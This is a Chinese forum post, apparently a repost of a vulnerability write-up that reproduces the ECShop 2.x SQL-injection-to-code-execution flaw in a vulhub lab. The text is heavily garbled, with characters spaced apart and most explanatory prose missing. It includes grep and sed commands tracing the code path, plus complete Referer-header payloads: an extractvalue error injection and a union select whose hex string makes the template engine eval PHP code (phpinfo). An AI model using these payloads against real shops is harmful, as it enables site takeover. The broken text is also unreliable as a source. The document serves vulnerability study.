搜索

[2051] 2021-01-24_ECShop2.xSQL注入任意代码执行漏洞分析复现

文档创建者:s7ckTeam
浏览次数:46
最后更新:2025-01-16
2021-01-24_ECShop2.xSQL注入任意代码执行漏洞分析复现 E C S h o p   2 . x   S Q L /   d o n 9   d o n 9 s e c   2 0 2 1 - 0 1 - 2 4   #   , 1 9 0 1 e c s h o p 2 . x   0 2 v u l h u b e c s h o p 2 . x 0 3 0 x 0 1 - S Q L d o c k e r p a y l o a d R e f e r e r H T T P _ R E F E R E R s e d u s e r . p h p d i s p l a y c d   v u l h u b / e c s h o p / x i a n z h i - 2 0 1 7 - 0 2 - 8 2 2 3 9 6 0 0 / d o c k e r - c o m p o s e   u p   - d h t t p : / / 1 . 1 . 1 . 1 : 8 0 8 0 / #   g r e p   - n   " H T T P _ R E F E R E R "   u s e r . p h p #   3 0 0   -   3 3 0 s e d   - n   " 3 0 0 , 3 3 0 p "   u s e r . p h p
H T T P _ R E F E R E R b a c k _ a c t , b a c k _ a c c k a s s i g n / *     * / e l s e i f   ( $ a c t i o n   = =   ' l o g i n ' ) {         i f   ( e m p t y ( $ b a c k _ a c t ) )         {                 i f   ( e m p t y ( $ b a c k _ a c t )   & &   i s s e t ( $ G L O B A L S [ ' _ S E R V E R ' ] [ ' H T T P _ R E F E R E R ' ] ) )                 {                         $ b a c k _ a c t   =   s t r p o s ( $ G L O B A L S [ ' _ S E R V E R ' ] [ ' H T T P _ R E F E R E R ' ] ,   ' u s e r . p h p ' )   ?   ' . / i n d e x . p h p '   :   $ G L O B A L S [ ' _ S E R V E R ' ] [ ' H T T P _ R E F E R E R ' ] ;                 }                 e l s e                 {                         $ b a c k _ a c t   =   ' u s e r . p h p ' ;                 }         }         $ c a p t c h a   =   i n t v a l ( $ _ C F G [ ' c a p t c h a ' ] ) ;         i f   ( ( $ c a p t c h a   &   C A P T C H A _ L O G I N )   & &   ( ! ( $ c a p t c h a   &   C A P T C H A _ L O G I N _ F A I L )   | |   ( ( $ c a p t c h a   &   C A P T C H A _ L O G I N _ F A I L )   & &   $ _ S E S S I O N [ ' l o g i n _ f a i l ' ]   >   2 ) )   & &   g d _ v e r s i o n ( )   >   0 )         {                 $ G L O B A L S [ ' s m a r t y ' ] - > a s s i g n ( ' e n a b l e d _ c a p t c h a ' ,   1 ) ;                 $ G L O B A L S [ ' s m a r t y ' ] - > a s s i g n ( ' r a n d ' ,   m t _ r a n d ( ) ) ;         }         $ s m a r t y - > a s s i g n ( ' b a c k _ a c t ' ,   $ b a c k _ a c t ) ;         $ s m a r t y - > d i s p l a y ( ' u s e r _ p a s s p o r t . d w t ' ) ; } g r e p   - r n   " f u n c t i o n   a s s i g n ( " s e d   - n   " 6 0 , 9 0 p "   i n c l u d e s / c l s _ t e m p l a t e . p h p
a s s i g n $ b a c k _ a c t $ t h i s - > _ v a r [ $ b a c k _ a c t ] = $ b a c k _ a c t i n c l u d e s / c l s _ t e m p l a t e . p h p : d i s p l a y u s e r . p h p d i s p l a y $ f i l e n a m e u s e r _ p a s s p o r t . d w t d i s p l a y $ t h i s - > f e t c h u s e r _ p a s s p o r t . d w t f e t c h $ t h i s - > m a k e _ c o m p i l e d d o c k e r 便 d o c k e r s e d   - n   " 9 0 , 1 4 0 p "   i n c l u d e s / c l s _ t e m p l a t e . p h p $ s m a r t y - > d i s p l a y ( ' u s e r _ p a s s p o r t . d w t ' ) ; #   t a r   - c z v f   e c s h o p 2 . x . t a r . g z   h t m l #   w e b m v   e c s h o p 2 . x . t a r . g z   h t m l /
p h p s t o r m u s e r _ p a s s p o r t . d w t h t m l _ e c h a s h $ k i s n e r t _ m o d _ e c h a s h $ v a l i s n e r t _ m o d $ v a l | $ f u n $ p a r a $ p a r a $ f u n i n s e r t _ $ f u n ( $ p a r a ) i n s e r t _ i n s e r t _ i n c l u d e s / l i b _ i n s e r t . p h p i n s e r t _ a d s #   C t r l + S h i f t + F
$ a r r S Q L 便 便 p a y l o a d : 0 x 0 2 - i n s e r t _ a d s S Q L f e t c h $ p o s i t i o n _ s t y l e $ r o w [ ' p o s i t i o n _ s t y l e ' ] $ r o w [ ' p o s i t i o n _ s t y l e ' ] S Q L S Q L s q l $ p o s i t i o n _ s t y l e s q l $ p o s i t i o n _ s t y l e ' s t r : ' R e f e r e r :   5 5 4 f c a e 4 9 3 e 5 6 4 e e 0 d c 7 5 b d f 2 e b f 9 4 c a a d s | a : 2 : { s : 3 : " n u m " ; s : 7 2 : " 0 , 1   p r o c e d u r e   a n a l y s e ( e x t r a c t v a l u e ( r a n d ( ) , c o n c a t ( 0 x 7 e , v e r s i o n ( ) ) ) , 1 ) - -   - " ; s : 2 : " i d " ; i : 1 ; } u s e r . p h p   - >   d i s p l a y ( )   - >   f e t c h ( )   - >   u s e r _ p a s s p o r t . d w t l i b _ i n s e r t . p h p   - >   i n s e r t _ a d s ( )   - >   f e t c h ( )   - >   $ p o s i t i o n _ s t y l e $ r o w [ ' p o s i t i o n _ i d ' ] $ a r r [ ' i d ' ]
便 f e t c h f e t c h 便 e v a l f e t c h _ s t r f e t c h _ s t r s e l e c t e v a l ( ) s t r n c m p ( $ f i l e n a m e , ' s t r : ' ,   4 )   = =   0 #   ' s t r : ' #   1 #   2 $ t h i s - s e l e c t ( ) r e t u r n   p r e g _ r e p l a c e ( " / { ( [ ^ } { n ] * ) } / e " ,   " $ t h i s - > s e l e c t ( ' 1 ' ) ; " ,   $ s o u r c e ) #   $ $ t a g { 0 }   = =   ' $ '
便 _ e v a l ( ) $ t h i s - > g e t _ v a r $ t h i s - > m a k e _ v a r $ v a l ,   g e t _ v a r ( ) : p a y l o a d _ e v a l ( ) p a y l o a d ( ) m a k e _ v a r ( ) g e t _ v a r ( ) s e l e c t ( ) $ t a g { 0 }   = =   ' $ ' r e t u r n   ' < ? p h p   e c h o   '   .   $ t h i s - > g e t _ v a l ( s u b s t r ( $ t a g ,   1 ) )   .   ' ;   ? > ' ; s t r p o s ( $ v a l ,   ' . $ ' )   ! = =   f a l s e ' $ t h i s - > _ v a r [ ' '   .   $ v a l   .   ' ' ] ' m a k e _ v a r ( )   - >   g e t _ v a r ( )   - >   s e l e c t ( )   - >   f e t c h _ s t r ( )   - >   e v a l ( ) #   < ? p h p   e c h o   $ t h i s - > _ v a r [ '   $ v a l   ' ] ; ? > ,   [ ' $ v a l   = =   a b c ' ] ; e c h o   p h p i n f o ( ) ; / / #   $ $ v a l   = =   $ a b c ' ] ; e c h o   p h p i n f o ( ) ; / / #   s e l e c t ( ) $ v a l   = =   { $ a b c ' ] ; e c h o   p h p i n f o ( ) ; / / #   p h p i n f o ( )   f e t c h _ s t r ( ) #   b y p a s s
f e t c h _ s t r ( ) p a y l o a d s q l $ p o s i t i o n _ s t y l e u n i o n   s e l e c t   : $ r o w [ ' p o s i t i o n _ i d ' ] 1 $ p o s i t i o n _ s t y l e 2 : p a y l o a d S Q L p a y l o a d 0 4 0 x 0 1 - S Q L p a y l o a d : 0 x 0 2 - #   b y p a s s $ v a l   = =   { $ a b c ' ] ; e c h o   p h p i n f o / * * / ( ) ; / / } $ v a l   = =   { $ a b c ' ] ; e c h o   p h p i n f o / * * / ( ) ; / / } #   p a y l o a d $ s q l     =   ' S E L E C T   a . a d _ i d ,   a . p o s i t i o n _ i d ,   a . m e d i a _ t y p e ,   a . a d _ l i n k ,   a . a d _ c o d e ,   a . a d _ n a m e ,   p . a d _ w i d t h ,   '   . ' p . a d _ h e i g h t ,   p . p o s i t i o n _ s t y l e ,   R A N D ( )   A S   r n d   '   . ' F R O M   '   .   $ G L O B A L S [ ' e c s ' ] - > t a b l e ( ' a d ' )   .   '   A S   a   ' . ' L E F T   J O I N   '   .   $ G L O B A L S [ ' e c s ' ] - > t a b l e ( ' a d _ p o s i t i o n ' )   .   '   A S   p   O N   a . p o s i t i o n _ i d   =   p . p o s i t i o n _ i d   '   . " W H E R E   e n a b l e d   =   1   A N D   s t a r t _ t i m e   < =   ' "   .   $ t i m e   .   " '   A N D   e n d _ t i m e   > =   ' "   .   $ t i m e   .   " '   " . " A N D   a . p o s i t i o n _ i d   =   ' "   .   $ a r r [ ' i d ' ]   .   " '   "   . ' O R D E R   B Y   r n d   L I M I T   '   .   $ a r r [ ' n u m ' ] ; $ r o w [ ' p o s i t i o n _ i d ' ]   = =   $ a r r [ ' i d ' $ $ r o w [ ' p o s i t i o n _ i d ' ]   = =   a r r [ ' i d ' ]   - >   ' / * #   ' / * 1 6 0 x 2 7 2 0 2 f 2 a $ v a l   = =   { $ a b c ' ] ; e c h o   p h p i n f o / * * / ( ) ; / / } $ p o s i t i o n _ s t y l e   = =   $ v a l   = =   { $ a b c ' ] ; e c h o   p h p i n f o / * * / ( ) ; / / } #   { $ a b c ' ] ; e c h o   p h p i n f o / * * / ( ) ; / / }   1 6 0 x 7 b 2 4 6 1 6 2 6 3 2 7 5 d 3 b 6 5 6 3 6 8 6 f 2 0 7 0 6 8 7 0 6 9 6 e 6 6 6 f 2 f 2 a 2 a 2 f 2 8 2 9 3 b 2 f 2 f 7 d #   $ a r r [ ' n u m ' ]   * /   u n i o n   s e l e c t   1 , 0 x 2 7 2 0 2 f 2 a , 3 , 4 , 5 , 6 , 7 , 8 , 0 x 7 b 2 4 6 1 6 2 6 3 2 7 5 d 3 b 6 5 6 3 6 8 6 f 2 0 7 0 6 8 7 0 6 9 6 e 6 6 6 f 2 f 2 a 2 a 2 f 2 8 2 9 3 b 2 f 2 f 7 d , 1 0 - - R e f e r e r :   5 5 4 f c a e 4 9 3 e 5 6 4 e e 0 d c 7 5 b d f 2 e b f 9 4 c a a d s | a : 2 : { s : 3 : " n u m " ; s : 1 1 0 : " * /   u n i o n   s e l e c t   1 , 0 x 2 7 2 0 2 f 2 a , 3 , 4 , 5 , 6 , 7 , 8 , 0 x 7 b 2 4 6 1 6 2 6 3 2 7 5 d 3 b 6 5 6 3 6 8 6 f 2 0 7 0 6 8 7 0 6 9 6 e 6 6 6 f 2 f 2 a 2 a 2 f 2 8 2 9 3 b 2 f 2 f 7 d , 1 0 - -   - " ; s : 2 : " i d " ; s : 4 : " '   / * " ; } 5 5 4 f c a e 4 9 3 e 5 6 4 e e 0 d c 7 5 b d f 2 e b f 9 4 c R e f e r e r :   5 5 4 f c a e 4 9 3 e 5 6 4 e e 0 d c 7 5 b d f 2 e b f 9 4 c a a d s | a : 2 : { s : 3 : " n u m " ; s : 7 2 : " 0 , 1   p r o c e d u r e   a n a l y s e ( e x t r a c t v a l u e ( r a n d ( ) , c o n c a t ( 0 x 7 e , v e r s i o n ( ) ) ) , 1 ) - -   - " ; s : 2 : " i d " ; i : 1 ; }
p a y l o a d p h p i n f o ( ) 0 5 S Q L 3 . x R e f e r e r :   5 5 4 f c a e 4 9 3 e 5 6 4 e e 0 d c 7 5 b d f 2 e b f 9 4 c a a d s | a : 2 : { s : 3 : " n u m " ; s : 1 1 0 : " * /   u n i o n   s e l e c t   1 , 0 x 2 7 2 0 2 f 2 a , 3 , 4 , 5 , 6 , 7 , 8 , 0 x 7 b 2 4 6 1 6 2 6 3 2 7 5 d 3 b 6 5 6 3 6 8 6 f 2 0 7 0 6 8 7 0 6 9 6 e 6 6 6 f 2 f 2 a 2 a 2 f 2 8 2 9 3 b 2 f 2 f 7 d , 1 0 - -   - " ; s : 2 : " i d " ; s : 4 : " '   / * " ; } 5 5 4 f c a e 4 9 3 e 5 6 4 e e 0 d c 7 5 b d f 2 e b f 9 4 c h t t p s : / / p a p e r . s e e b u g . o r g / 6 9 1 / h t t p s : / / g i t h u b . c o m / v u l h u b / v u l h u b / b l o b / m a s t e r / e c s h o p / x i a n z h i - 2 0 1 7 - 0 2 - 8 2 2 3 9 6 0 0 / R E A D M E . z h - c n . m d h t t p s : / / b a d c o d e . c c / 2 0 1 8 / 0 9 / 0 4 / E C S h o p - 0 d a y % E 7 % 9 A % 8 4 % E 5 % A 0 % 9 5 % E 8 % 9 0 % B D % E 4 % B 9 % 8 B % E 8 % B 7 % A F /
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理